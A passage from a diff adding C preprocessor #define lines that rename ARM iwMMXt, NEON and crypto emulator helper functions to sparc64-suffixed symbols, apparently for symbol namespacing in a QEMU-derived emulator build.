gen_helper_add_saturate_sparc64 +#define gen_helper_add_setq gen_helper_add_setq_sparc64 +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_sparc64 +#define gen_helper_clz32 gen_helper_clz32_sparc64 +#define gen_helper_clz64 gen_helper_clz64_sparc64 +#define gen_helper_clz_arm gen_helper_clz_arm_sparc64 +#define gen_helper_cpsr_read gen_helper_cpsr_read_sparc64 +#define gen_helper_cpsr_write gen_helper_cpsr_write_sparc64 +#define gen_helper_crc32_arm gen_helper_crc32_arm_sparc64 +#define gen_helper_crc32c gen_helper_crc32c_sparc64 +#define gen_helper_crypto_aese gen_helper_crypto_aese_sparc64 +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_sparc64 +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_sparc64 +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_sparc64 +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_sparc64 +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_sparc64 +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_sparc64 +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_sparc64 +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_sparc64 +#define gen_helper_double_saturate gen_helper_double_saturate_sparc64 +#define gen_helper_exception_internal gen_helper_exception_internal_sparc64 +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_sparc64 +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_sparc64 +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_sparc64 +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_sparc64 +#define gen_helper_get_user_reg gen_helper_get_user_reg_sparc64 +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_sparc64 +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_sparc64 +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_sparc64 +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_sparc64 +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_sparc64 +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_sparc64 +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_sparc64 +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_sparc64 +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_sparc64 +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_sparc64 +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_sparc64 +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_sparc64 +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_sparc64 +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_sparc64 +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_sparc64 +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_sparc64 +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_sparc64 +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_sparc64 +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_sparc64 +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_sparc64 +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_sparc64 +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_sparc64 +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_sparc64 +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_sparc64 +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_sparc64 +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_sparc64 +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_sparc64 +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_sparc64 +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_sparc64 +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_sparc64 +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_sparc64 +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_sparc64 +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_sparc64 +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_sparc64 +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_sparc64 +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_sparc64 +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_sparc64 +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_sparc64 +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_sparc64 +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_sparc64 +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_sparc64 +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_sparc64 +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_sparc64 +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_sparc64 +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_sparc64 +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_sparc64 +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_sparc64 +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_sparc64 +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_sparc64 +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_sparc64 +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_sparc64 +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_sparc64 +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_sparc64 +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_sparc64 +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_sparc64 +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_sparc64 +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_sparc64 +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_sparc64 +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_sparc64 +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_sparc64 +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_sparc64 +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_sparc64 +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_sparc64 +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_sparc64 +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_sparc64 +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_sparc64 +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_sparc64 +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_sparc64 +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_sparc64 +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_sparc64 +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_sparc64 +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_sparc64 +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_sparc64 +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_sparc64 +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_sparc64 +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_sparc64 +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_sparc64 +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_sparc64 +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_sparc64 +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_sparc64 +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_sparc64 +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_sparc64 +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_sparc64 +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_sparc64 +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_sparc64 +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_sparc64 +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_sparc64 +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_sparc64 +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_sparc64 +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_sparc64 +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_sparc64 +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_sparc64 +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_sparc64 +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_sparc64 +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_sparc64 +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_sparc64 +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_sparc64 +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_sparc64 +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_sparc64 +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_sparc64 +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_sparc64 +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_sparc64 +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_sparc64 +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_sparc64 +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_sparc64 +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_sparc64 +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_sparc64 +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_sparc64 +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_sparc64 +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_sparc64 +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_sparc64 +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_sparc64 +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_sparc64 +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_sparc64 +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_sparc64 +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_sparc64 +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_sparc64 +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_sparc64 +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_sparc64 +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_sparc64 +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_sparc64 +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_sparc64 +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_sparc64 +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_sparc64 +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_sparc64 +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_sparc64 +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_sparc64 +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_sparc64 +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_sparc64 +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_sparc64 +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_sparc64 +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_sparc64 +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_sparc64 +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_sparc64 +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_sparc64 +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_sparc64 +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_sparc64 +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_sparc64 +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_sparc64 +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_sparc64 +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_sparc64 +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_sparc64 +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_sparc64 +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_sparc64 +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_sparc64 +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_sparc64 +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_sparc64 +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_sparc64 +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_sparc64 +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_sparc64 +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_sparc64 +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_sparc64 +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_sparc64 +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_sparc64 +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_sparc64 +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_sparc64 +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_sparc64 +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_sparc64 +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_sparc64 +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_sparc64 +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_sparc64 +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_sparc64 +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_sparc64 +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_sparc64 +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_sparc64 +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_sparc64 +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_sparc64 +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_sparc64 +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_sparc64 +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_sparc64 +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_sparc64 +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_sparc64 +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_sparc64 +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_sparc64 +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_sparc64 +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_sparc64 +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_sparc64 +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_sparc64 +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_sparc64 +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_sparc64 +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_sparc64 +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_sparc64 +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_sparc64 +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_sparc64 +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_sparc64 +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_sparc64 +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_sparc64 +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_sparc64 +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_sparc64 +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_sparc64 +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_sparc64 +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_sparc64 +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_sparc64 +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_sparc64 +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_sparc64 +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_sparc64 +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_sparc64 +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_sparc64 +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_sparc64 +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_sparc64 +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_sparc64 +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_sparc64 +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_sparc64 +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_sparc64 +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_sparc64 +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_sparc64 +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_sparc64 +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_sparc64 +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_sparc64 +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_sparc64 +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_sparc64 +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_sparc64 +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_sparc64 +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_sparc64 +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_sparc64 +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_sparc64 +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_sparc64 +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_sparc64 +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_sparc64 +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_sparc64 +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_sparc64 +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_sparc64 +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_sparc64 +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_sparc64 +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_sparc64 +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_sparc64 +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_sparc64 +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_sparc64 +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_sparc64 +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_sparc64 +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_sparc64 +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_sparc64 +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_sparc64 +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_sparc64 +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_sparc64 +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_sparc64 +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_sparc64 +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_sparc64 +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_sparc64 +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_sparc64 +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_sparc64 +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_sparc64 +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_sparc64 +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_sparc64 +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_sparc64 +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_sparc64 +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_sparc64 +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_sparc64 +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_sparc64 +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_sparc64 +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_sparc64 +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_sparc64 +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_sparc64 +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_sparc64 +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_sparc64 +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_sparc64 +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_sparc64 +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_sparc64 +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_sparc64 +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_sparc64 +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_sparc64 +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_sparc64 +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_sparc64 +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_sparc64 +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_sparc64 +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_sparc64 +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_sparc64 +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_sparc64 +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_sparc64 +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_sparc64 +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_sparc64 +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_sparc64 +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_sparc64 +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_sparc64 +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_sparc64 +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_sparc64 +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_sparc64 +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_sparc64 +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_sparc64 +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_sparc64 +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_sparc64 +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_sparc64 +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_sparc64 +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_sparc64 +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_sparc64 +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_sparc64 +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_sparc64 +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_sparc64 +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_sparc64 +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_sparc64 +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_sparc64 +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_sparc64 +#define gen_helper_neon_tbl gen_helper_neon_tbl_sparc64 +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_sparc64 +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_sparc64 +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_sparc64 +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_sparc64 +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_sparc64 +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_sparc64 +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_sparc64 +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_sparc64 +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_sparc64 +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_sparc64 +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_sparc64 +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_sparc64 +#define gen_helper_neon_zip16 gen_helper_neon_zip16_sparc64 +#define gen_helper_neon_zip8 gen_helper_neon_zip8_sparc64 +#define gen_helper_pre_hvc gen_helper_pre_hvc_sparc64 +#define gen_helper_pre_smc gen_helper_pre_smc_sparc64 +#define gen_helper_qadd16 gen_helper_qadd16_sparc64 +#define gen_helper_qadd8 gen_helper_qadd8_sparc64 +#define gen_helper_qaddsubx gen_helper_qaddsubx_sparc64 +#define gen_helper_qsub16 gen_helper_qsub16_sparc64 +#define gen_helper_qsub8 gen_helper_qsub8_sparc64 +#define gen_helper_qsubaddx gen_helper_qsubaddx_sparc64 +#define gen_helper_rbit gen_helper_rbit_sparc64 +#define gen_helper_recpe_f32 gen_helper_recpe_f32_sparc64 +#define gen_helper_recpe_u32 gen_helper_recpe_u32_sparc64 +#define gen_helper_recps_f32 gen_helper_recps_f32_sparc64 +#define gen_helper_rintd gen_helper_rintd_sparc64 +#define gen_helper_rintd_exact gen_helper_rintd_exact_sparc64 +#define gen_helper_rints gen_helper_rints_sparc64 +#define gen_helper_rints_exact gen_helper_rints_exact_sparc64 +#define gen_helper_ror_cc gen_helper_ror_cc_sparc64 +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_sparc64 +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_sparc64 +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_sparc64 +#define gen_helper_sadd16 gen_helper_sadd16_sparc64 +#define gen_helper_sadd8 gen_helper_sadd8_sparc64 +#define gen_helper_saddsubx gen_helper_saddsubx_sparc64 +#define gen_helper_sar_cc gen_helper_sar_cc_sparc64 +#define gen_helper_sdiv gen_helper_sdiv_sparc64 +#define gen_helper_sel_flags gen_helper_sel_flags_sparc64 +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_sparc64 +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_sparc64 +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_sparc64 +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_sparc64 +#define gen_helper_set_rmode gen_helper_set_rmode_sparc64 +#define gen_helper_set_user_reg gen_helper_set_user_reg_sparc64 +#define gen_helper_shadd16 gen_helper_shadd16_sparc64 +#define gen_helper_shadd8 gen_helper_shadd8_sparc64 +#define gen_helper_shaddsubx gen_helper_shaddsubx_sparc64 +#define gen_helper_shl_cc gen_helper_shl_cc_sparc64 +#define gen_helper_shr_cc gen_helper_shr_cc_sparc64 +#define gen_helper_shsub16 gen_helper_shsub16_sparc64 +#define gen_helper_shsub8 gen_helper_shsub8_sparc64 +#define gen_helper_shsubaddx gen_helper_shsubaddx_sparc64 +#define gen_helper_ssat gen_helper_ssat_sparc64 +#define gen_helper_ssat16 gen_helper_ssat16_sparc64 +#define gen_helper_ssub16 gen_helper_ssub16_sparc64 +#define gen_helper_ssub8 gen_helper_ssub8_sparc64 +#define gen_helper_ssubaddx gen_helper_ssubaddx_sparc64 +#define gen_helper_sub_saturate gen_helper_sub_saturate_sparc64 +#define gen_helper_sxtb16 gen_helper_sxtb16_sparc64 +#define gen_helper_uadd16 gen_helper_uadd16_sparc64 +#define gen_helper_uadd8 gen_helper_uadd8_sparc64 +#define gen_helper_uaddsubx gen_helper_uaddsubx_sparc64 +#define 